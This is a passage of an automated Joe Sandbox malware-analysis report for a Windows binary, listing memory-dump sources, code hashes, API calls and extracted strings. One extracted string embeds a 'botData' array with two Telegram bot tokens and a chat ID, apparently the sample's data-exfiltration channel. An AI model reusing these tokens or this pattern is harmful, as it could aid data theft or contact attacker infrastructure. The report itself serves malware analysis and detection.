                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EF06DB1B08B4182E780FB19F8921A92361EB88780F548135EA0DE33A5CF3CD5559340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                                                                                                                                          • Instruction ID: fb5413d852635e04275e70b1e7c998a8ebe781cd20253505f76d8ab701a0c994
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b7369aa21f13457fdb80794d56569737c8fbd0d1e1785f4d2f6eb8c1f94b77e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90B09220E0BB07C2EA887F11AC4331422A87F48B00F858038C80DB2370DF2C21B9A710
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                                                                                                                                          • Instruction ID: 7aadf8e54e525f8150674506becd9d17e013ba6b04960eb884fef6934f2effc7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d93d4f47f0554419e45a1ec9d0f821d131654d7134ca0c2c872342092d7dd02b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF044B27186568ADBD8EF28A803A297794F708384F808539D589D7E54DB3C90509F04
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                                                                                                                                          • Instruction ID: 12089c025ad22b54752938663fbd0aee68858e6c5b161193585a0720e798324b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 331b233821632d522d8aa5d39469b012a11824c95e81c535aefe4626e22429b9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84A00122A0C882D4E684BF10A9524642270AB50300B406232C40DA60B19E2CE84AA310
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: : $All$None$commentStyle$commentStyle must be 'All' or 'None'$decimal$dropNullPlaceholders$emitUTF8$enableYAMLCompatibility$indentation$null$precision$precisionType$precisionType must be 'significant' or 'decimal'$significant$useSpecialFloats
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-1515510190
                                                                                                                                                                                                                                                                                          • Opcode ID: 8e8e43b97737ee5d4a0d66c8873ca1e6bd3003a91424e30525bf8069139e92c6
                                                                                                                                                                                                                                                                                          • Instruction ID: 800c6d672d45fd1ac3a392796407772fb173fc9dc21d8cc04445dab05aa9491d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e8e43b97737ee5d4a0d66c8873ca1e6bd3003a91424e30525bf8069139e92c6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0F1B462A0D78285EB90BB25E4423F92791EF45398F409136E95DA7ADBEE7CE444E300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: for detail.$See
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-4250990345
                                                                                                                                                                                                                                                                                          • Opcode ID: b007f3ce75071648310378d29781fe5e5159f84a7405af41eb14086d5de9e148
                                                                                                                                                                                                                                                                                          • Instruction ID: e8678a6f54a4288a5b84e6a85d3bfd6de3d271bff78338ccb7cb1c1106c77580
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b007f3ce75071648310378d29781fe5e5159f84a7405af41eb14086d5de9e148
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0F1C062F1CB8245FF50FB64D1427AC2361AB557E8F109731DE6D63AD7DE78A082A300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                                                          • String ID: const botData = [ { token: "7393424100:AAFLvSKBupyvFiHgVXYbSv1Jfy8ydDSOnIA", chat_id: "6442787215", }, { token: "7776586945:AAFQTT1AD04IUpOLlf1aziN70zm8frk2JnQ", $Error opening file: $Error writing to file: $ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                          • API String ID: 3668304517-3574094325
                                                                                                                                                                                                                                                                                          • Opcode ID: 001b823d7f1ee9be339957d99efd59f1a5fd07df3d876c31017bc05864d3515b
                                                                                                                                                                                                                                                                                          • Instruction ID: 9a2fc8488a8446db2852b41d1cc8988bae557d4aaf060ed1eb33a19e4b2f1052
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 001b823d7f1ee9be339957d99efd59f1a5fd07df3d876c31017bc05864d3515b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2622CE62A1CA82C9EB50FF64D9423EC23A0FB44798F544231DE5DA7AD9EF79E541D300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID: 0$0$0
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-3137946472
                                                                                                                                                                                                                                                                                          • Opcode ID: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                                                                                                                                          • Instruction ID: 35634eae9a2e6fb1fae7d210a35c8b6c429254ab87eb3e8deb42d00fcc76da66
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d0da343a1475c20010ef155d6f5fda03df1a6debcc8e1fbbf282866201055c9
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42E1E733D0D68685F7E0BF2486522BD2B959B72B84F54A031D68DE77D2CE2DA45BA300
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Locinfo::_Locinfo_ctorRegister
                                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                                          • API String ID: 3702003507-1866435925
                                                                                                                                                                                                                                                                                          • Opcode ID: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
                                                                                                                                                                                                                                                                                          • Instruction ID: a5a52d2b0e05a0583da81a0fd7dc3784009e38c65687d0c919f19765bdde48d4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 863137caec39b83c71940fc7ac1af1c53c89f8aefa90435721c78012b45b2d8f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47C13C6260DA8181EBA0EF19E4413AEB7A0FB84B84F548136DA8D97BA6DF3DD445D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                                                                                                                                          • String ID: bad locale name$false$true
                                                                                                                                                                                                                                                                                          • API String ID: 4121308752-1062449267
                                                                                                                                                                                                                                                                                          • Opcode ID: 984ef57e58059ef21608445b4852af3edbd3fda220cd47d4a9535fc0879939a6
                                                                                                                                                                                                                                                                                          • Instruction ID: 3e725357ae698f20aa15270ff72670367e0b22faad26f6775740bd81bcee7403
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 984ef57e58059ef21608445b4852af3edbd3fda220cd47d4a9535fc0879939a6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48614B22B0DB429AFB95FFB094523BC32A5AF40708F045035DE4DB7AE6DE38A456E344
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$ApisFile__std_exception_destroy__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: ", "$: "
                                                                                                                                                                                                                                                                                          • API String ID: 2261858363-747220369
                                                                                                                                                                                                                                                                                          • Opcode ID: 07568a877f46371d82166c9877742fa18b20ba9943c204e1dd04eb17a62a91d1
                                                                                                                                                                                                                                                                                          • Instruction ID: ccb6a4d0a4a125d34370a40c2bcbdf0dc3f9a0b3a99d149f872bc3609e97b1d6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07568a877f46371d82166c9877742fa18b20ba9943c204e1dd04eb17a62a91d1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 78D1AD72B18B8185EB44FF69E1463AC2362EB44BC8F605032DA5D67BDADF79D881D340
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$__std_fs_code_page
                                                                                                                                                                                                                                                                                          • String ID: replacement $Nothing found
                                                                                                                                                                                                                                                                                          • API String ID: 4261731725-1856175495
                                                                                                                                                                                                                                                                                          • Opcode ID: bc93b126b443df490168a687db7657939f0ea43145bb46f46aefc071cbb7ee2e
                                                                                                                                                                                                                                                                                          • Instruction ID: 235655575dd1704c9118004adedbcfa04e7e3ae69f181aff17ad3f4f2f94586f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc93b126b443df490168a687db7657939f0ea43145bb46f46aefc071cbb7ee2e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDC1D162F1CB4685EB90BB65D0023AD6361EB857E8F100632DE6CA7BD9DE3CE481D700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                          • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                                          • API String ID: 667068680-1247241052
                                                                                                                                                                                                                                                                                          • Opcode ID: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                                                                                                                                          • Instruction ID: 7805781ac7f998559d5aa34eca254df95dfcdbc03407205a38421bb810cecf61
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9ca5811517390810536183ba872c98996ed66007aa42ec6ddc9aee17bf1dbed
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DAF07F64A1DB07C1EA84BF62BC8607423A4BF48755F444035C82DEB3A0EF7CA199A780
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                          • Opcode ID: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                                                                                                                                          • Instruction ID: 5bd16cb237f5e0d4d4e28624590f0afebd6b0ad705f1ec58d07576feb4846efa
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0902fee2bd272c2c2419d964ebaf25cd8e49d6c6d5d53ec91bdd45b6b3ecc3a1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2D19E7290C7418AEBA0BB65D4423AD77A0FB55798F102135DA4DA77D6CF38E486DB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF643F791C8,?,?,?,?,00007FF643F71FDD,?,?,?,?,00007FF643F5EAF8), ref: 00007FF643F78A6C
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF643F791C8,?,?,?,?,00007FF643F71FDD,?,?,?,?,00007FF643F5EAF8), ref: 00007FF643F78A78
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                          • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                                                          • Opcode ID: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                                                                                                                                          • Instruction ID: 7a835813c06d91b3cc581e6820120ea2f67a47ac8aea16195d2a2de09748ebda
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87bea0995d79addeec59c8d507c887efab68793b560fa11f00cb5242ca2bc547
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4410322B1DA0291FA95FF16A8125B923A1BF49BE0F484535DD0DE77D8EF3CE445A700
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.2167177998.00007FF643F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF643F20000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167068231.00007FF643F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167241971.00007FF643F90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167279178.00007FF643FAD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.2167318398.00007FF643FB1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff643f20000_dwVrTdy.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                          • String ID: f$p$p
                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1995029353
                                                                                                                                                                                                                                                                                          • Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                                                                                                                                          • Instruction ID: 701c36bd878d0d5fca114475e18a307c2163b029248aa4709d427347c18bb915
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E312AE72E0C24386FBE4BF14D1566B976A1FB40754F984536E699A7AC8DF3CE480EB00
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
